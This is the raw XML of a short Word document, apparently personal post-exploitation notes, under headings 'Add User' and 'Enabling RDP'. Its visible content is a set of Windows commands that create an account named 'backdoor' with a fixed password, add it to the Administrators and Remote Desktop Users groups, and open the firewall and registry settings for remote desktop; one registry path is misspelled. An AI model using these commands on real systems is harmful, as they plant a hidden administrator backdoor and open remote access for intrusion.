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AFC9F" w14:textId="60BC8929" w:rsidR="007013C8" w:rsidRPr="007013C8" w:rsidRDefault="007013C8" w:rsidP="007013C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Add</w:t>
      </w:r>
      <w:r w:rsidRPr="007013C8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User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2A164E" w14:textId="77777777" w:rsidR="007013C8" w:rsidRPr="007013C8" w:rsidRDefault="007013C8" w:rsidP="00701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013C8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>net user backdoor backdoor123 /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA6B788" w14:textId="77777777" w:rsidR="007013C8" w:rsidRPr="007013C8" w:rsidRDefault="007013C8" w:rsidP="00701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013C8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007013C8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007013C8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> administrators backdoor /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DBA65D" w14:textId="77777777" w:rsidR="007013C8" w:rsidRPr="007013C8" w:rsidRDefault="007013C8" w:rsidP="007013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013C8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007013C8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007013C8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Remote Desktop Users" backdoor /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255FB5D6" w14:textId="5DA12286" w:rsidR="007D0A48" w:rsidRDefault="00F56B8A">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="183FDAD2" w14:textId="77777777" w:rsidR="00F56B8A" w:rsidRDefault="00F56B8A" w:rsidP="00F56B8A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Enabling RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BA6794" w14:textId="77777777" w:rsidR="00F56B8A" w:rsidRDefault="00F56B8A" w:rsidP="00F56B8A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> firewall set service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RemoteDesktop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2488EF" w14:textId="77777777" w:rsidR="00F56B8A" w:rsidRDefault="00F56B8A" w:rsidP="00F56B8A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t>reg add "HKEY_LOCAL_MACHINE\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CurentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">\Control\Terminal Server" /v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fDenyTSConnections</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /t </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA60F71" w14:textId="77777777" w:rsidR="00F56B8A" w:rsidRDefault="00F56B8A" w:rsidP="00F56B8A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t>REG_DWORD /d 0 /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAB3AFE" w14:textId="77777777" w:rsidR="00F56B8A" w:rsidRDefault="00F56B8A" w:rsidP="00F56B8A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t>reg add "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hklm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\system\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>currentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Control\Terminal Server" /v "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AllowTSConnections</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" /t REG_DWORD /d 0x1 /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B65004" w14:textId="77777777" w:rsidR="00F56B8A" w:rsidRDefault="00F56B8A"/>
    <w:sectPr w:rsidR="00F56B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NDM0MTMwNrO0MDNV0lEKTi0uzszPAykwrAUAC1rGgywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00CE2BB8"/>
    <w:rsid w:val="007013C8"/>
    <w:rsid w:val="00CE2BB8"/>
    <w:rsid w:val="00D8585A"/>
    <w:rsid w:val="00F56B8A"/>
    <w:rsid w:val="00F92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9FBF9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8AD1BEEA-E82C-4DAA-891C-9FAFEF11B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13C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13C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13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13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Hany</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Karim Hany</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-23T00:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-23T00:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>